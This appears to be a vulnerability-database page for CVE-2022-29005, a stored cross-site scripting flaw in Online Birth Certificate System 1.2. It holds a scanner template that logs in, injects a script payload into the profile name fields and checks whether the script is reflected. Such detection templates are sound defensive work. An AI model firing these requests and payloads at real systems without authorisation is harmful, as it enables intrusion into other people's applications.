| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2022-29005 | 23 May 202216:16 | – | attackerkb | |
| CVE-2022-29005 | 23 May 202220:41 | – | circl | |
| Online Birth Certificate System 跨站脚本漏洞 | 23 May 202200:00 | – | cnnvd | |
| CVE-2022-29005 | 23 May 202215:31 | – | cve | |
| CVE-2022-29005 | 23 May 202215:31 | – | cvelist | |
| EUVD-2022-33435 | 23 May 202215:31 | – | euvd | |
| CVE-2022-29005 | 23 May 202216:16 | – | nvd | |
| CVE-2022-29005 | 23 May 202216:16 | – | osv | |
| Cross site scripting | 23 May 202216:16 | – | prion | |
| PT-2022-19359 · Unknown · Online Birth Certificate System | 23 May 202200:00 | – | ptsecurity |
id: CVE-2022-29005
info:
name: Online Birth Certificate System 1.2 - Stored Cross-Site Scripting
author: TenBird
severity: medium
description: |
Online Birth Certificate System 1.2 contains multiple stored cross-site scripting vulnerabilities in the component /obcs/user/profile.php, which allows an attacker to execute arbitrary web script or HTML via a crafted payload injected into the fname or lname parameters.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website.
remediation: |
To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
reference:
- https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt
- https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
- https://nvd.nist.gov/vuln/detail/CVE-2022-29005
- http://online.com
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-29005
cwe-id: CWE-79
epss-score: 0.02526
epss-percentile: 0.82825
cpe: cpe:2.3:a:phpgurukul:online_birth_certificate_system:1.2:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: phpgurukul
product: online_birth_certificate_system
tags: cve,cve2022,xss,obcs,authenticated,phpgurukul,vuln
variables:
str: "{{rand_base(6)}}"
http:
- raw:
- |
POST /obcs/user/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
mobno={{username}}&password={{password}}&login=
- |
POST /obcs/user/profile.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
fname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=
- |
GET /obcs/user/dashboard.php HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'contains(header_3, "text/html")'
- 'status_code_3 == 200'
- contains(body_3, 'admin-name\">{{str}}<script>alert(document.domain);</script>')
condition: and
# digest: 4a0a00473045022100e04676695b4cfe75abf1ec3381a69f5bf80cd6058e97195392f09680ba77d3e002204d7a93c023ea91347b1e429055e841fe1878537c283c1bc70ba01de45120e24b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation